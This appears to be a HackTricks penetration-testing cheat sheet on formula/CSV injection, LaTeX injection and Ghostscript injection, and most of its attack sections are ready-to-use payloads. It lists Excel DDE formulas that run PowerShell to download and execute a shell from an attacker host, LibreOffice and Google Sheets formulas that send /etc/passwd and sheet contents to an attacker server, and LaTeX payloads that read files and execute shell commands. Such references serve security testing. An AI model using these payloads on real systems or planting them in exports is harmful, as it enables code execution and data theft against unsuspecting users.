12 KiB
Formula/CSV/Doc/LaTeX/GhostScript Injection
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
Formula Injection
Info
If your input is being reflected inside CSV files (or any other file that is probably going to be opened by Excel), you maybe able to put Excel formulas that will be executed when the user opens the file or when the user clicks on some link inside the excel sheet.
{% hint style="danger" %} Nowadays Excel will alert (several times) the user when something is loaded from outside the Excel in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload. {% endhint %}
Wordlist
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
Hyperlink
The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).
The following example was taken from https://payatu.com/csv-injection-basic-to-exploit
Imagine a security breach in a Student Record Management system is exploited through a CSV injection attack. The attacker's primary intention is to compromise the system used by teachers to manage student details. The method involves the attacker injecting a malicious payload into the application, specifically by entering harmful formulas into fields meant for student details. The attack unfolds as follows:
-
Injection of Malicious Payload:
- The attacker submits a student detail form but includes a formula commonly used in spreadsheets (e.g.,
=HYPERLINK("<malicious_link>","Click here")
). - This formula is designed to create a hyperlink, but it points to a malicious server controlled by the attacker.
- The attacker submits a student detail form but includes a formula commonly used in spreadsheets (e.g.,
-
Exporting Compromised Data:
- Teachers, unaware of the compromise, use the application's functionality to export the data into a CSV file.
- The CSV file, when opened, still contains the malicious payload. This payload appears as a clickable hyperlink in the spreadsheet.
-
Triggering the Attack:
- A teacher clicks on the hyperlink, believing it to be a legitimate part of the student's details.
- Upon clicking, sensitive data (potentially including details from the spreadsheet or the teacher's computer) is transmitted to the attacker's server.
-
Logging the Data:
- The attacker's server receives and logs the sensitive data sent from the teacher's computer.
- The attacker can then use this data for various malicious purposes, further compromising the privacy and security of the students and the institution.
RCE
Check the original post for further details.
In specific configurations or older versions of Excel, a feature called Dynamic Data Exchange (DDE) can be exploited for executing arbitrary commands. To leverage this, the following settings must be enabled:
- Navigate to File → Options → Trust Center → Trust Center Settings → External Content, and enable Dynamic Data Exchange Server Launch.
When a spreadsheet with the malicious payload is opened (and if the user accepts the warnings), the payload is executed. For example, to launch the calculator application, the payload would be:
`=cmd|' /C calc'!xxx`
Additional commands can also be executed, such as downloading and executing a file using PowerShell:
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
Local File Inclusion (LFI) in LibreOffice Calc
LibreOffice Calc can be used to read local files and exfiltrate data. Here are some methods:
- Reading the first line from the local
/etc/passwd
file:='file:///etc/passwd'#$passwd.A1
- Exfiltrating the read data to an attacker-controlled server:
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))
- Exfiltrating more than one line:
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
- DNS exfiltration (sending read data as DNS queries to an attacker-controlled DNS server):
=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))
Google Sheets for Out-of-Band (OOB) Data Exfiltration
Google Sheets offers functions that can be exploited for OOB data exfiltration:
- CONCATENATE: Appends strings together -
=CONCATENATE(A2:E2)
- IMPORTXML: Imports data from structured data types -
=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
- IMPORTFEED: Imports RSS or ATOM feeds -
=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))
- IMPORTHTML: Imports data from HTML tables or lists -
=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
- IMPORTRANGE: Imports a range of cells from another spreadsheet -
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
- IMAGE: Inserts an image into a cell -
=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")
LaTeX Injection
Usually the servers that will find on the internet that convert LaTeX code to PDF use pdflatex
.
This program uses 3 main attributes to (dis)allow command execution:
--no-shell-escape
: Disable the\write18{command}
construct, even if it is enabled in the texmf.cnf file.--shell-restricted
: Same as--shell-escape
, but limited to a 'safe' set of predefined **commands (**On Ubuntu 16.04 the list is in/usr/share/texmf/web2c/texmf.cnf
).--shell-escape
: Enable the\write18{command}
construct. The command can be any shell command. This construct is normally disallowed for security reasons.
However, there are other ways to execute commands, so to avoid RCE it's very important to use --shell-restricted
.
Read file
You might need to adjust injection with wrappers as [ or $.
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
Read single lined file
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
Read multiple lined file
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
Write file
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
Command execution
The input of the command will be redirected to stdin, use a temp file to get it.
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
If you get any LaTex error, consider using base64 to get the result without bad characters
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}
Cross Site Scripting
From @EdOverflow
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
Ghostscript Injection
Check https://blog.redteam-pentesting.de/2023/ghostscript-overview/
References
- https://notsosecure.com/data-exfiltration-formula-injection-part1
- https://0day.work/hacking-with-latex/
- https://salmonsec.com/cheatsheet/latex_injection
- https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.